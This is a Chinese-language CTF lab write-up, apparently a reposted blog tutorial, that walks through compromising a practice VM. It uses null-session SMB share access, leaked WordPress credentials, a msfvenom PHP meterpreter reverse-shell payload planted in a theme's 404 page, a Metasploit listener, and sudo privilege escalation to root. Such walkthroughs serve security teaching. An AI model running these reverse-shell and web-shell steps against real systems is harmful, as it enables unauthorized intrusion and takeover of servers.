CTF入门之SMB服务信息泄露,渗透主机

admin 2022年6月8日06:39:06评论71 views字数 2885阅读9分37秒阅读模式

欢迎回来,我的新手黑客

今天给大家带来的是关于CTF方面的SMB服务信息泄露,这个内容其实也并不新鲜,但是我还是选择用文字把它记录下来,作为入门的参考资料




环境搭建:下载对应的镜像,使Kali和靶机处于同一个网段,即可以ping通

镜像下载地址:




进入我们的正文


Step1:接触一个陌生的网络环境,首先肯定是摸清大致的网络环境,还是一样的套路,使用nmap进行内网扫描

nmap -Pn -T4 192.168.83.0/24

CTF入门之SMB服务信息泄露,渗透主机

从扫描结果中确定我们的目标是192.168.83.128,开放的端口有22,80,139,445,3306,6667,开放的服务还挺多的,这些端口里面有139,445比较陌生,所以我们还需要一些更详细的信息以便找到突破口


接下来更加详细的探测该主机上面的服务

nmap -sV -T4 192.168.83.128

CTF入门之SMB服务信息泄露,渗透主机

我们看到139和445端口都是属于samba服务,这个时候问题就来了,什么是samba服务呢?

引用维基百科的说法:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common Internet File System,缩写为CIFS),一种应用层网络协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行通信和通讯等资源。它也提供经认证的行程间通信机能

上面解释的是SMB服务,那么什么是samba服务呢?

同样引用维基百科的说法:samba是种用来让UNIX系列的操作系统与微软操作系统的SMB/CIFS网络协议做链接的自由软件

简而言之,SMB服务运行在微软主机上面,samba服务运行在UNIX系列的操作系统上面,此软件在Windows与UNIX系列操作系统之间搭起一座桥梁,让两者的资源可互通有无




Step2:大致了解了服务之后,我们针对SMB服务进行弱点分析,主要有两种方法

使用空口令,弱口令进行登录,查看敏感信息使用工具搜索对应版本的漏洞信息,例如上一篇发布的FTP服务后门

接下来,先来看一下该服务共享的文件夹

smbclient -L 192.168.83.128

在终端输入命令回车之后,提示输入密码,这个时候根本不知道什么密码啊,我们尝试使用空密码,直接回车,竟然回显了一些东西

CTF入门之SMB服务信息泄露,渗透主机

根据上述图片信息,我们可以得知:该主机共享了三个文件夹,其中的IPC$为空连接,主机类似开启了Web server

接下来我们逐一探测三个文件夹

smbclient '\192.168.83.128print$'

CTF入门之SMB服务信息泄露,渗透主机

提示输入密码的时候依然直接回车,我们发现没有权限,拒绝连接,换一个探测试试

smbclient '\192.168.83.128share$'

CTF入门之SMB服务信息泄露,渗透主机

回车之后,很幸运,我们进入到了共享文件夹中,根据提示,我们输入help查看可以使用的命令

CTF入门之SMB服务信息泄露,渗透主机


接下来查看一下该文件夹中的文件


CTF入门之SMB服务信息泄露,渗透主机


我们注意到有几个txt文件,还有一个wp文件夹,我们先查看这些txt文件,看是否会发现什么,先下载到本地,再查看

get deets.txt

CTF入门之SMB服务信息泄露,渗透主机

CTF入门之SMB服务信息泄露,渗透主机

有了一个重大的收获,看到了一个Password先记住估计后面会用到

一次下载并查看其他的txt文件,并没有什么其他的收获

CTF入门之SMB服务信息泄露,渗透主机

CTF入门之SMB服务信息泄露,渗透主机

看完了几个txt文件之后,我们来看一下wordpress文件夹里面有什么?为什么会注意到这个文件夹呢?是因为看到这个文件夹就联想到了wordpress,简而言之是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统

cd wpls

CTF入门之SMB服务信息泄露,渗透主机

我们看到有一个wp-config.php的文件,里面有一些配置信息,先下载下来看看

CTF入门之SMB服务信息泄露,渗透主机

CTF入门之SMB服务信息泄露,渗透主机

查看该文件,我们看到了数据库的账号和密码




Step3:接下来我们尝试登陆数据库

mysql -h 192.168.83.128 -u Admin -p

输入密码后,显示无法登录

CTF入门之SMB服务信息泄露,渗透主机

换一种思路,这个账号密码有没有可能是SSH的账号密码

CTF入门之SMB服务信息泄露,渗透主机

提示输入密码,第一次输入数据库密码,很遗憾无法登录,这时候想起来刚才有一个文件的的Password,输入试试,很遗憾,还是无法登录


这个时候想起来wordpress,会不会是网站后台的管理员账号密码,赶快试一下

CTF入门之SMB服务信息泄露,渗透主机

使用浏览器访问,不对啊,不是wordpress的样式,难道是路径不对?

那就先对网站进行扫描看看会不会有新的发现

dirb http://192.168.83.128/

CTF入门之SMB服务信息泄露,渗透主机

从扫描的输出中我们注意到了这个路径,使用浏览器打开验证是不是管理员后台登陆页面

CTF入门之SMB服务信息泄露,渗透主机

确实为网站的管理员登陆页面,使用账号密码登陆试看看

CTF入门之SMB服务信息泄露,渗透主机

成功登陆后台,那这个时候我们需要尝试获取root权限,对于这种站点怎么拿shell呢?

上传插件,并运行修改404页面,并运行

就拿第二种方法举例子,这个时候我们需要怎么修改404页面呢?大致的思路是,生成返回TCP连接的PHP代码即有效载荷也叫Payload,将其嵌入到404页面中,当用户访问这个页面时,代码运行,返回TCP连接

说到Payload自然就想起了msfvenom这个功能程序

msfvenom -p php/meterpreter/reverse_tcp LHOST=192168.43.134 LPORT=4444 -f raw


其中-p参数指定负载类型,因为是生成PHP代码,所以负载指定为php/meterpreter/reverse_tcp;LHOST指定返回TCP时需要连接的IP地址,即攻击机本身的IP地址,LPORT指定返回TCP连接时连接的端口


CTF入门之SMB服务信息泄露,渗透主机

接下来我们复制生成的有效载荷,从Payload size下一行开始复制,注意不要复制/*

点击左侧的Appearance->Editor

CTF入门之SMB服务信息泄露,渗透主机

点击完选择右侧的主题,并点击404.php页面进行编辑

CTF入门之SMB服务信息泄露,渗透主机


编辑完成并点击更新文件


CTF入门之SMB服务信息泄露,渗透主机

做到这一步前期的工作都已经完成




Step4:这个时候我们只需要开启监听器,监听是否有人连接,我们使用msfconsole,设置相关参数,并开启监听

msfconsoleuse exploit/multi/handlerset payload php/meterpreter/reverse_tcpset LHOST 192.168.83.134set LPORT 4444exploit

CTF入门之SMB服务信息泄露,渗透主机

没有报错,说明正常开启监听,这个时候我们访问相对应的404页面,实现有效载荷的运行,帮助我们获取TCP连接

CTF入门之SMB服务信息泄露,渗透主机


使用浏览器访问页面,敲下回车的同时,我们发现已经获得了TCP连接


CTF入门之SMB服务信息泄露,渗透主机


这个时候我们进入主机的shell,查看当前用户信息

CTF入门之SMB服务信息泄露,渗透主机

首先我们还是先优化终端,让它看起来好看一下

python -c "import pty;pty.spawn('/bin/sh')"

CTF入门之SMB服务信息泄露,渗透主机


接下来查看该主机上面的其他用户,切换到/home目录


CTF入门之SMB服务信息泄露,渗透主机


发现有一个名为togie的用户,我们尝试以该用户的身份登录,第一次尝试前面数据库配置文件中出现的密码,发现不能正常登录,这个时候尝试一下前面txt文件中出现的密码,发现可以正常登录


CTF入门之SMB服务信息泄露,渗透主机

查看当前可以执行的操作

CTF入门之SMB服务信息泄露,渗透主机

尝试提权

CTF入门之SMB服务信息泄露,渗透主机

成功提权,获取root权限,查看flag

CTF入门之SMB服务信息泄露,渗透主机

做到这一步我们找到了flag




如果你支持我的文章,帮我点一下右下角的“在看”,谢谢你啦

原文始发于微信公众号(Kali渗透测试教程):CTF入门之SMB服务信息泄露,渗透主机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月8日06:39:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CTF入门之SMB服务信息泄露,渗透主机http://cn-sec.com/archives/972024.html

发表评论

匿名网友 填写信息